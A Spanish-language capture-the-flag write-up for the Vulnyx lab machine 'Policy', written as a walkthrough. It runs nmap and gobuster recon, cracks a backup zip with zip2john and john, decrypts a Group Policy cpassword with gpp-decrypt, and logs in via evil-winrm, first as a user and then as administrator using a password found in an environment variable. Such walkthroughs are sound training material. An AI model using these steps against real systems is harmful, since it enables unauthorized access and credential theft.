Write-up: Máquina Policy (Vulnyx)


Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:

$ netdiscover -i eth1 -r 10.0.2.0/24

  • Kali (Máquina Atacante): 10.0.2.4
  • Máquina Victima: 10.0.2.71
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:

$ ping -c 1 10.0.2.71


Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.

A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:

$ nmap -Pn -p- 10.0.2.71 -sVC


Como podemos comprobar la Máquina Victima tiene abiertos los puertos 80135139445598547001496644966549666496674966849669 49670.

Comprobamos que es lo que corre por el puerto 80.


A continuación, realizamos con la herramienta gobuster un fuzzing web, para ello ejecutamos el siguiente comando:

$ gobuster dir -u http://10.0.2.71 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt


Encontramos el directorio backup.

Accedemos a el.


Volvemos a realizar con la herramienta gobuster un fuzzing web por extensiones, para ello ejecutamos el siguiente comando:

$ gobuster dir -u http://10.0.2.71/backup -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x bak,zip,rar


Encontramos el fichero groups.zip.

Accedemos a el para descargarlo.


Al intentar descomprimirlo nos pide contraseña, extraemos el hash del fichero .zip con la herramienta zip2john, para ello ejecutamos el siguiente comando:

$ zip2john groups.zip > groupshash

A continuación, intentamos crackearlo, para ello utilizamos la herramienta john indicando el diccionario rockyou, para ello ejecutamos el siguiente comando:

$ john groupshash --wordlist=rockyou.txt

Obtenemos la contraseña Zipper.

Descomprimimos el fichero .zip, para ello ejecutamos el siguiente comando:

$ unzip groups.zip

Obtenemos el fichero Groups.xml.

Lo visualizamos, para ello ejecutamos el siguiente comando:

$ cat Groups.xml

Obtenemos el password del usuario xerosec encriptada en AES256 en la variable cpassword.

A continuación, con la herramienta gpp-decrypt desciframos la contraseña, para ello ejecutamos el siguiente comando:

$ gpp-decrypt IwLNLy0Ck5xIlXEsPMTbOF1f/NnliQFKeGv139eUEgE

Obtenemos la contraseña GPP2k26blahblah.

Nos conectamos a la maquina victima a traves de WinRM (5985) con la ayuda de la herramienta evil-winrm, para ello ejecutamos el siguiente comando:

$ evil-winrm -i 10.0.2.71 -u 'xerosec' -p 'GPP2k26blahblah'


¡¡¡Somos xerosec!!!.

Revisamos las variables de entorno, para ello ejecutamos el siguiente comnando:

PS> dir env:


Encontramos la variable PASSWORD que almacena la contraseña GigaAdmin123! que es probable que sea del usuario administrator ya que es el unico usuario que hay a parte del usuario actual Xerosec.

Nos volvemos a conectar a la maquina victima a traves de WinRM (5985) con la ayuda de la herramienta evil-winrm, para ello ejecutamos el siguiente comando:

$ evil-winrm -i 10.0.2.71 -u 'administrator' -p 'GigaAdmin123!'


¡¡¡Ya somos administrator!!!.